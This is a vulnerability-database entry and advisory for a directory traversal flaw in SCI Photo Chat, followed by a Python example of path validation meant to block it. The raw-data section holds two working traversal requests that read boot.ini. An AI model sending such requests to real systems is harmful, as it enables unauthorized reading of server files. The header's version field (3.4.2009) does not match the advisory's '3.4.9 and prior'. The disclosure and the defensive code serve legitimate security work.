Vendor: SCI Photo Chat
By: SecurityFocus
CVSS: 7.5 (HIGH)
Vulnerability Type: Directory Traversal
CWE: 22
Product Name: SCI Photo Chat
Affected Version From: 3.4.2009
Affected Version To: 3.4.2009
Patch Exists: YES
Related CWE: N/A
CPE: a:sci_photo_chat:sci_photo_chat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SCI Photo Chat Directory Traversal Vulnerability

SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27872/info

SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.

This issue affects SCI Photo Chat 3.4.9 and prior versions. 

GET /docs/..\..\..\..\..\boot.ini HTTP/1.0
GET /docs/../../../../../boot.ini HTTP/1.0
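
The Mitigation section asks for input validation. The following is an added example (not code from SCI Photo Chat or from the advisory) of one way a server could resolve a /docs/ request so that both separator forms in the requests above are refused. The document root /srv/photochat/docs, the function names and the third sample request are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

DOC_PREFIX = "/docs/"              # URL prefix seen in the requests on the page
DOC_ROOT = "/srv/photochat/docs"   # assumed document root (hypothetical)
SEGMENT = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9._-]*")  # allowlist per path segment


def resolve_doc_path(target, doc_root=DOC_ROOT):
    """Map a request target to a path under doc_root, or return None to refuse."""
    # Validate the decoded form, since that is what reaches the filesystem.
    path = unquote(target.split("?", 1)[0])
    if not path.startswith(DOC_PREFIX):
        return None
    # Windows file APIs accept both separators, so treat "\" exactly like "/".
    parts = path[len(DOC_PREFIX):].replace("\\", "/").split("/")
    # fullmatch refuses "..", ".", empty segments, drive letters and NUL bytes.
    if not all(SEGMENT.fullmatch(p) for p in parts):
        return None
    candidate = posixpath.normpath(posixpath.join(doc_root, *parts))
    # Containment check as a second layer. This is lexical only; on a real
    # filesystem compare os.path.realpath() results so symlinks are resolved.
    if posixpath.commonpath([doc_root, candidate]) != doc_root:
        return None
    return candidate


def check_request_line(line):
    """Return (target, resolved path or None) for one HTTP request line."""
    _method, target, _version = line.split(" ", 2)
    return target, resolve_doc_path(target)


SAMPLE_REQUESTS = [
    r"GET /docs/..\..\..\..\..\boot.ini HTTP/1.0",  # request form from the page
    "GET /docs/../../../../../boot.ini HTTP/1.0",   # request form from the page
    "GET /docs/help/index.html HTTP/1.0",           # constructed, legitimate
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        target, resolved = check_request_line(line)
        print(f"{target!r:45} -> {resolved or 'REFUSED (400)'}")
```

Normalizing the backslash to a forward slash before splitting is what makes the first request fail the same check as the second; a filter that looks only for "../" would pass it through.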